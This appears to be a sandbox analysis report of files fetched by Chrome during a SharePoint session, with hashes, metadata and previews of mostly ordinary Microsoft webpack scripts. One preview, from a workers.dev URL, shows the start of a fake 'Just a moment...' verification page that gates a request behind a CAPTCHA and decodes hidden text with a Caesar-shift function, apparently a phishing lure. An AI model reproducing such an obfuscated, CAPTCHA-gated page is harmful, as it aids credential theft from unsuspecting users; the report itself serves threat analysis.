                                                            Preview:/*! For license information please see fui.core-3c2ad75e.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.core"],{"fui.core_220":(e,t,n)=>{n.d(t,{HJB:()=>qo,$UI:()=>jo,tVV:()=>es,Z3h:()=>Li,qR:()=>ki,rnJ:()=>Ei,HlF:()=>Fi,pnX:()=>zo,fem:()=>Ai,qpf:()=>Jo,kJO:()=>p,sJL:()=>cr,dbD:()=>dr,tOI:()=>$o,Xi1:()=>ts,$B_:()=>it,_m4:()=>$e,Yfl:()=>Mi,hms:()=>f,ApQ:()=>u,u5r:()=>l,jEJ:()=>Wo,FSK:()=>k,Xg_:()=>L,tGZ:()=>or,ZzM:()=>sr,wZv:()=>Ji,IO8:()=>Xi,PYA:()=>Zo,KMv:()=>we,Bk2:()=>ns,ACv:()=>Ri,sad:()=>Ni,pA3:()=>Ko,FDl:()=>No,S4d:()=>Ro,lmF:()=>Xo,Cgu:()=>Go,_de:()=>yi,AFX:()=>ao,e_K:()=>bi,Rx2:()=>ji,j7M:()=>Pi,NR5:()=>Vo,EH7:()=>Kr,rRK:()=>Ti,Noz:()=>Ui,YnK:()=>Hi,BaS:()=>st,svg:()=>ot,q_s:()=>Yo,m8o:()=>D,A4z:()=>S,gpp:()=>y,_Er:()=>I,B2N:()=>x,jyi:()=>h,R8k:()=>_,$$c:()=>m,KAk:()=>C,CP8:()=>b,xyn:()=>g,HGe:()=>v,jdf:()=>Me,TRP:()=>Pe,uc5:()=>ei,Hr5:()=>Qr,RZ$:()=>Ii,Gxo:()=>Bi,JgS:()=>Qo,CEv:()=>Bo,HhS:()=>A,ir4:()=>ro,uuw:()=>io,Oz8:()=>
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (36614)
                                                            Category:downloaded
                                                            Size (bytes):58977
                                                            Entropy (8bit):5.418283004804952
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D98B15B435AA33A960BAA8DEB6A4B24E
                                                            SHA1:9AB6475DCB57E253405C5668D87FD54A1D912B38
                                                            SHA-256:EF1FBFD8B0AE5339E91B17355A17CD48747108A1B4BA324DF64F6A2D948138F0
                                                            SHA-512:D11F69E35799E845CBF15EE2B6486F301E54DCF48265268AB121E11191D0CC3467BBF715E951E1AF48C7B56F939C8056E2738A2663AEBBEA64F8058ADA4FC8C7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/156.js
                                                            Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[156],{2941:function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return I},c:function(){return O},d:function(){return p},e:function(){return s}});var a,i=n(2624),r=function(){function e(e){i.m.isNotNullOrUndefined(e,"id"),this._id=e}return e.create=function(t){return new e(t)},Object.defineProperty(e.prototype,"id",{get:function(){return this._id},enumerable:!1,configurable:!0}),e.prototype.isEmpty=function(){return 0===this._id.length},e}(),o=r,s=i.i.createCustom("sp-client-base:LogSource",function(e){return r.create("")}),c=function(){function e(e){if(this._head=-1,this._count=0,this._isIterating=!1,e<=0)throw new Error("Size must be positive");this._size=e,this._buffer=new Array(e)}return Object.defineProperty(e.prototype,"count",{get:function(){return this._count},enumerable:!1,configurable:!0}),e.prototype.push=function(e){this._ensureNotIterating(),this._head++,this._count++,this._head===this._size
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Java source, ASCII text, with CRLF, LF line terminators
                                                            Category:downloaded
                                                            Size (bytes):853
                                                            Entropy (8bit):5.330164360189167
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:40EEB7DA7CEACF358F23DD963779488A
                                                            SHA1:E7FEF66F02480EA23B1BE83FDDC58B98F6DDD76D
                                                            SHA-256:7C2424BFFA539DAC3F11E119330B2B69DC1EC1C444D8DFA1A31DE61A6103A359
                                                            SHA-512:12240DB7418407A50FACEB906BD2C243B351B580671011307C0A9DFB17AB0C6F09D69BCA74E2C4EFD2BE26BAC16C0D084B89408D93416D8EFE9E4298602390BB
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:"https://timecusa-my.sharepoint.com/_layouts/15/odspserviceworkerproxy.aspx?swManifestName=spserviceworker&debug=false&bypass=false&navigationPreloadHeaderValue=%7B%22supportsFeatures%22%3A%5B1855%2C61313%5D%7D&dataHost=Nucleus&applications=%5B%7B%22id%22%3A%22STS%22%2C%22swPrefetchManifestName%22%3A%22stsserviceworkerprefetch%22%7D%2C%7B%22id%22%3A%22SPHome%22%7D%2C%7B%22id%22%3A%22SitePages%22%7D%2C%7B%22id%22%3A%22Embed%22%7D%2C%7B%22id%22%3A%22CreateGroup%22%7D%2C%7B%22id%22%3A%22SingleWebPart%22%7D%2C%7B%22id%22%3A%22VivaHome%22%7D%2C%7B%22id%22%3A%22BrokerLogon%22%7D%2C%7B%22id%22%3A%22Clipchamp%22%7D%2C%7B%22id%22%3A%22MeeBridge%22%7D%2C%7B%22id%22%3A%22SPStart%22%7D%2C%7B%22id%22%3A%22Agreements%22%7D%5D&list=v2&prefetchListData=true&defaultBrotli=true&authenticateFast=true&inlineAuth=v2&wwData=true&prefetchFilebrowserPageInTeams=true&FUIV9Flights=[-83099905,3]&spStartApplicationWebBundle=true&enableIntegrities=true&spartanOneDriveWireframe=true&streamViewServerLoad=true&streamInlineScript=true&listhandler=v2"
                                                            Preview:..var _startTime=performance.now(),_startTimeTicks=Date.now();.var _shouldBypass=false;.var _cdnBaseUrl='https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/';.var _swBuildNumber='odsp-web-prod_2025-01-03.002';.var _wwBuildNumber='odsp-web-prod_2025-01-03.002';.var _oneShellUrl='https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell';.var _wwKillSwitches={};.var _killSwitches={"2ECA6C8B-E22D-4A59-9895-73D3E5800079":true,"8D3F72B3-5A9A-49A4-AADE-64888324EB32":true};.var _prefetchBaseUrls={"stsserviceworkerprefetch":"https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/"};.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/stsserviceworkerprefetch/stsserviceworkerprefetch.js');.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/spserviceworker.js');...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (5634)
                                                            Category:downloaded
                                                            Size (bytes):27391
                                                            Entropy (8bit):5.401242634199241
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E818F1A76DE4107C02D799E664D9C64E
                                                            SHA1:30FA1B2099FBC47E9D108464927D87F51D6DB47C
                                                            SHA-256:3FA3434E00CDB226FE5CF2DA0A76F48FAA09DF1B2C2FEC3146689E0A0022564B
                                                            SHA-512:08A891556839F85801076A45F158F2D0F20F5FC883E59A45143EB7A97E852C5895144E599B79D31C69B4B30AC2BD5C4EE1186904F68687812DF3A4C5441DA841
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/57.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[57],{5211:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_538"),i=n("react-lib"),r=n(3),o=n(8),s=n(41),c=n(9),d=n("odsp.util_517"),l=n(47),u=n(34),f=n(6),p=n(15),m=n(4498),_=n(3781),h=n(59),b=n(3780),g=n(43),v=n(63),y=n(357),S=n(5),D=n(11),I=(0,n(19).a)(function(){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(0),n.e(1),n.e(3),n.e(2),n.e(7),n.e(6),n.e(8),n.e(9),n.e(33),n.e(1003)]).then(n.bind(n,4731))];case 1:return[2,e.sent().ApproveRejectDialog]}})})}),x=(0,r.c)(function(e,t){var n=t.onContinue,r=t.onCancel,o=t.resolve,s=t.reject,c=(0,a.dc)(t,["onContinue","onCancel","resolve","reject"]);return i.createElement(I,(0,a.q5)({},c,{onContinue:function(e){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(t){switch(t.label){case 0:return n?[4,n(e)]:[3,2];case 1:t.sent(),t.l
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12946)
                                                            Category:dropped
                                                            Size (bytes):3220849
                                                            Entropy (8bit):5.417654263866386
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E0AC49308C9209A518098AF7936C0855
                                                            SHA1:695A3C36B5FB1AA6B1770F22A4805A20C0AE71F5
                                                            SHA-256:E851F1F22AB43349F103B6032587B1622CC24C968C8045C08AB3991D8117E33A
                                                            SHA-512:3EEFD05D6094F91DDDE0C9D06B8245BAFCC698E411B51E4EF2C6FACA6BEC8BBBC1DA491FDF038424A7386A7A35473DB2BF97B02141266690C51AD129F23E3A54
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:/*! For license information please see odblightspeedwebpack.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odblightspeedwebpack"],[function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return d},c:function(){return c},d:function(){return s}});var a=n(16),i=n(829),r=new Map,o=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);r.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=r.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=this.id;if((0,i.a)()){var n=JSON.stringify(t);this.unpack=new Function("t","return t[".concat(n,"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11339)
                                                            Category:dropped
                                                            Size (bytes):14479
                                                            Entropy (8bit):5.314007622880761
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:3CF80AE03C08F1BE646CB16A60FB1C87
                                                            SHA1:C3820CB97F2C91FC5C8215311A8EF88D1D8BFFFB
                                                            SHA-256:B896CC5472D409C78F4807F4A574E5C36DD6624CDE5D320CF9452C2CE5126B5D
                                                            SHA-512:D175C102B846CA5BA7547F25BEE2324DA68AFD52AA8EAEE4C6344B0A2EC8E677259464D1603C6D316A72638E8869711BBDC552FE5DB16E59C9A97AF04A18FC56
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1],{6597:function(e,t,n){n.d(t,{a:function(){return U}});var a=n("tslib_538"),i=n("react-lib"),r=n(29),o=n(373),s=n("fui.util_261"),c=n(285),d=n("fui.core_220"),l=n(1060),u=n(9099),f=n(2891),p=n(325),m=n(1805),_=n(1800),h=n(197),b=n(136),g=n(82),v=(0,s.VH)(function(e,t){return{root:(0,s.t3)(e,t&&{touchAction:"none",selectors:{"& *":{userSelect:"none"}}})}}),y=n(546),S=n(132),D=n(286),I={start:"touchstart",move:"touchmove",stop:"touchend"},x={start:"mousedown",move:"mousemove",stop:"mouseup"},C=function(e){function t(t){var n=e.call(this,t)||this;return n._currentEventType=x,n._events=[],n._onMouseDown=function(e){var t=i.Children.only(n.props.children).props.onMouseDown;return t&&t(e),n._currentEventType=x,n._onDragStart(e)},n._onMouseUp=function(e){var t=i.Children.only(n.props.children).props.onMouseUp;return t&&t(e),n._currentEventType=x,n._onDragStop(e)},n._onTouchStart=function(e){var t=i.Children.only(n
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):16
                                                            Entropy (8bit):3.875
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                            SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                            SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                            SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlrj6noM96tSxIFDZFhlU4=?alt=proto
                                                            Preview:CgkKBw2RYZVOGgA=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8336)
                                                            Category:dropped
                                                            Size (bytes):10919
                                                            Entropy (8bit):5.518182275049125
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:426E5216E76D2D94CA47C2C7AACEE3E3
                                                            SHA1:410F78B40539835F93C2FDD082E76D36131091A4
                                                            SHA-256:0CCD0BB015E899CCB470A6AA09B4E1B52D97A5E7EF892105878FC96C81F3142E
                                                            SHA-512:BAF351ACFBC7C2DE82400BCC52633FEB8252E0ADBB73A2EEE462167E8702308F41AA59FCA95CED752C53D1234CCD12AB9C31A438E2306F458ABFA5663AC5371D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[360],{2783:function(e,t,n){n.d(t,{a:function(){return x},b:function(){return D},c:function(){return y},d:function(){return v},e:function(){return I},f:function(){return g},g:function(){return S}});var a=n("odsp.util_517"),i=n(380),r=n(2975),o={ODB:62043};function s(){return a.ov.isFeatureEnabled(o)}var c=!1;function d(e){var t,n=l("Error"),a=(0,i.a)();a.availability.customCopilotEAPCheckErrorType=e,null===(t=window.localStorage)||void 0===t||t.setItem(n,a.availability.customCopilotEAPCheckErrorType)}function l(e){return"UserInEAPGroup_".concat(e)}var u=n(86),f={ODB:61346},p={ODB:61866},m={ODB:61991},_={ODB:62020},h={ODB:62111},b={ODB:62337};function g(e){var t,o,p=e.pageContextForEAPCheck,m=(0,i.a)();if(!a.x9.isActivated("87a98255-e313-4151-a344-a023c75eaadb","10/18/2024","isgulati - enable rcd check before enabling copilot")&&(null==p?void 0:p.IsRestrictedContentDiscoverabilityEnabled))return m.availability.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 45 x 72, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.9697984750326016
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:335B09E0B137DE66227259A0DC01E416
                                                            SHA1:49AEE2E1E1C3F373E9115F2B61C3909243E96642
                                                            SHA-256:EAF62D06DF22CB1A7446A6CC2C437FF4DB75EA4E0D3128259385F820534B8A2C
                                                            SHA-512:582EDCFF359F2316DBE3A7596E6C7894D02027C96AC744C9E3EEAE4C67D499AD8136116F3F4666370CB02276E6CC6A2B874417EC5C631C2BFFA54BEBC315F8AC
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:.PNG........IHDR...-...H......A.$....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (65308), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):273990
                                                            Entropy (8bit):5.703792224042833
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:74E71154F65132E5E050518E1B561211
                                                            SHA1:1CE754A460B3B68079693B85D64071CEE6CE8EB6
                                                            SHA-256:8D42DC8419CFDDE4D5DBD63DFC3EAEF31D2D87F54AF75E93E6759962D9343C09
                                                            SHA-512:F2070C0064AA956C138640E7EC4D466158898FF558F33FDD86128E6402684F81856C7083A284E726B0318827D7B77325B46B758E9B39D155005BAB051E725C8A
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_core_start"),function(){var e,t,n,o,r,i={61448:function(e,t,n){"use strict";var o;n.d(t,{f:function(){return o}}),function(e){e.depth0="0 0 0 0 transparent",e.depth4="0 1.6px 3.6px 0 rgba(0, 0, 0, 0.132), 0 0.3px 0.9px 0 rgba(0, 0, 0, 0.108)",e.depth8="0 3.2px 7.2px 0 rgba(0, 0, 0, 0.132), 0 0.6px 1.8px 0 rgba(0, 0, 0, 0.108)",e.depth16="0 6.4px 14.4px 0 rgba(0, 0, 0, 0.132), 0 1.2px 3.6px 0 rgba(0, 0, 0, 0.108)",e.depth64="0 25.6px 57.6px 0 rgba(0, 0, 0, 0.22), 0 4.8px 14.4px 0 rgba(0, 0, 0, 0.18)"}(o||(o={}))},2403:function(e,t,n){"use strict";n.d(t,{I:function(){return c}});var o=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,r=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,i=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,s=/\s+/g,a=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (23186)
                                                            Category:dropped
                                                            Size (bytes):35460
                                                            Entropy (8bit):5.5781544597764725
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D6B01AB443E796064CB2A367EE9DB0BC
                                                            SHA1:A9BD1CB6840248A61847101CA68F17C4AFBB3128
                                                            SHA-256:89F400A1C18D42B3369CA008EBC95CB0929152B145516C3571988A90BF04F083
                                                            SHA-512:F27ADF72A845F03751B88B8902E870AC722CCC4BEC7221FE504CD7122A2AA74A67CF7F97398E50793C1C9B972651B3CEFC5F90C9F84DEFBEB5CEDBA8FC4548C1
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[21],{9425:function(e,t,n){n.d(t,{a:function(){return A}});var a=n("react-lib"),i=n(143),r=n(142),o=n(289),s=n("fui.core_220"),c=n(162),d=n(2011);const l=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,u=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,f=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,m=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/,_=(0,n(2571).a)("PersonRegular","1em",["M10 2a4 4 0 1 0 0 8 4 4 0 0 0 0-8ZM7 6a3 3 0 1 1 6 0 3 3 0 0 1-6 0Zm-2 5a2 2 0 0 0-2 2c0 1.7.83 2.97 2.13 3.8A9.14 9.14 0 0 0 10 18c1.85 0 3.58-.39 4.87-1.2A4.35 4.35 0 0 0 17 13a2 2 0 0 0-2-2H5Zm-1 2a1 1 0 0 1 1-1h10a1 1 0 0 1 1 1c0 1.3-.62 2.28-1.67 2.95A8.16 8.16 0 0 1 10 17a8.16 8.16 0 0 1-4.33-1.05A3.36 3.36 0 0 1 4 13Z"]);var h=n(9426),b=n(6728);const g={active:"active",inactiv
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (9812)
                                                            Category:downloaded
                                                            Size (bytes):542713
                                                            Entropy (8bit):5.029863009139396
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:497ECF4A2C8F84480FB66B106F28AD1C
                                                            SHA1:AD9D8B08FDF1A3AFF9EBE89E5D1B73F0B99C9E55
                                                            SHA-256:BD123E2832F22F85C8F953C9F4043F80FF4704ED41E560E83D6121867132432D
                                                            SHA-512:34D73FBDB489F10F5BDA5EFEA8889D458EDA653873D90FD05F244C13DC3D3EBD3E127D4A0E0D3195E9423B3C68993FF15E80EE253BEB982F92614B884830EE36
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/en-us/ondemand.resx.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx","deferred.resx"],{9557:function(e){e.exports=JSON.parse('{"needsPasswordLabel":"{0} requires a password.","apply":"Apply","encryptDialogFooter":"All content in this file will be encrypted and search engines won\\u0027t be able to access the file\\u0027s metadata.","userPasswordMsg":"Set a password to open this file.","encryptDialogTitle":"Encrypt and protect your PDF","encryptionPasswordConfirmPlaceHolder":"Confirm password","encryptionPasswordEnterPlaceHolder":"Enter password","encryptionPasswordErrMsg":"Passwords do not match","encryptionPasswordErrMsgForMatching":"Permission password must not match open password","encryptionOwnerPasswordMsg":"Set permissions password","restrictPermission":"Restrict permission","enterPassword":"Enter password","enterPasswordDialogLabel":"Enter password to open this PDF file","protectionLabel":"Protection","invalidPasswordPrompt":"Incorrect password. Please t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:downloaded
                                                            Size (bytes):1264
                                                            Entropy (8bit):4.5439539886688545
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D98FFF61A4797EDDFFA598A6BB430017
                                                            SHA1:021025F85E47C7EC040EE30B8AD307F77EC75A25
                                                            SHA-256:174C7D3F423EDE614CE84ADE8BDDD67EA49EC27486C2124BE75FB807C293B3BE
                                                            SHA-512:5BEA81B46C227A2B8240EB0FB7D5FC3D99E7CE47E6E28AD13C123213BBFF3C9736E03923C9B2EE655AF66D21F9A3DD6A9075DE9DABADDFAF021041622D311817
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://config.fp.measure.office.com/conf/v2/o365se/fpconfig.min.json?monitorId=O365se
                                                            Preview:{"s":1000,"n":3,"e":[{"e":"*.fp.measure.office.com","w":1000000,"m":128},{"e":"afdcanary.officeapps.live.com","w":5,"m":128},{"e":"canary.officeapps.live.com","w":5,"m":128},{"e":"ecs.office.com","w":2,"m":128},{"e":"graph.microsoft.com","w":4,"m":128},{"e":"login.microsoftonline.com","w":4,"m":128},{"e":"m365.cloud.microsoft","w":4,"m":128},{"e":"mira.config.skype.com","w":2,"m":128},{"e":"miracanary.officeapps.live.com","w":5,"m":128},{"e":"outlook.cloud.microsoft","w":4,"m":128},{"e":"outlook.office.com","w":20,"m":128},{"e":"outlook.office365.com","w":20,"m":128},{"e":"ow1.res.office365.com","w":20,"m":1},{"e":"pp1.prd.attend.teams.microsoft.com","w":1,"m":128},{"e":"pp1.prd.bmc.teams.microsoft.com","w":1,"m":128},{"e":"s-005-office.config.skype.com","w":2,"m":128},{"e":"tr-common-mira.office.com","w":4,"m":128},{"e":"tr-ofc-afdwac.office.com","w":10,"m":128},{"e":"tr-ofc-atm.office.com","w":10,"m":128},{"e":"tr-ofc-mira.office.com","w":10,"m":128},{"e":"tr-ooc-acdc.office.com","w"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (30291)
                                                            Category:dropped
                                                            Size (bytes):139018
                                                            Entropy (8bit):5.38013247901556
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E1D1AD20188E27B6DB1796B7A2CEFB12
                                                            SHA1:1D91312D2D8E2D845EA5B6489678D399E9965935
                                                            SHA-256:E087A5CC66BD45EDD4B19E97BB2C068DB3B140A1DF3F361CA0560C9BFCEA33CE
                                                            SHA-512:31C7069B1BBE8E546434438C57A3C4277E5C8BE4552611C9BE20196B988E9C79F5104A4A04FF544C486CC9E938DFAA9E1F253C4EB9068550CA34B2EB4FE34707
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_mast_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["mast"],{76626:function(n,t,e){var r=e(92855),i=e(41230),o=e(68340),u=e(8101),a=e(15164),c=e(27039),s=e(75184),l=e(62657),f=e(84414),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=l.S);var f=e.propertyStorageOverride;!f||f.getProperty&&f.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,(function(n){if
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (1899)
                                                            Category:downloaded
                                                            Size (bytes):5743
                                                            Entropy (8bit):5.367353499837034
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:10B463423D90EC9BF9D22758492A135E
                                                            SHA1:6767FB8ED81316D0D6977BA765AFEA9BA51CCEB4
                                                            SHA-256:AD53D7B81ED7EEB7C6926162A2987EABC01693B7A46C25E8319D6B4F40958AA0
                                                            SHA-512:0C29468629D9D520A727B1FA071B7F8A992C091CF9B4181E0F3EE501DC4AAD429F003ABFDD0BC2AFFF0ED5FED5CE753100B987A30C37B3E7664BCB730C221448
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://bc5d8028.26e125934b57cd512fa70e06.workers.dev/
                                                            Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAA49Q0t2Nc4MA1OI", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                            Category:downloaded
                                                            Size (bytes):7886
                                                            Entropy (8bit):3.1280056112498884
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:604ADFB53677B5CA4F910FFB131B3E7C
                                                            SHA1:5F1A0FB4E4AD3707E591CE16352158263488ED70
                                                            SHA-256:24638331466A52BB66F912090E7A9CC9E3DF2236E39C187C9409104526B472B0
                                                            SHA-512:35F618F42ADFEE6D1335C67F729C298789419FE2930371A91683F60481794488DFAF15B572E6FC1BE70833EF12DFE57432725F6336B6B73DCFB52596F57F30A5
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://timecusa-my.sharepoint.com/_layouts/15/images/odbfavicon.ico?rev=47
                                                            Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(`.(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(p.....................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (26822)
                                                            Category:dropped
                                                            Size (bytes):44295
                                                            Entropy (8bit):5.155482584512178
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:672FB16923748199A6D461B1DE6DAEFF
                                                            SHA1:E126F88EA12DC840A13B7DAFF9960CFE4534DF03
                                                            SHA-256:5704EDC0CCC53D8739E9B989FC68079218C8A86C4726F20194FC22BD4D5DC340
                                                            SHA-512:BC62AB6A5C7FA0D995EE81A53819AA9415D2B852F0E2E1F9B206469BC26EACD5E697FFE5A3875AD84046997B3AF45053A629B42919C0EEFA01E827C0FF36C5AB
                                                            Malicious:false
                                                            Reputation:unknown
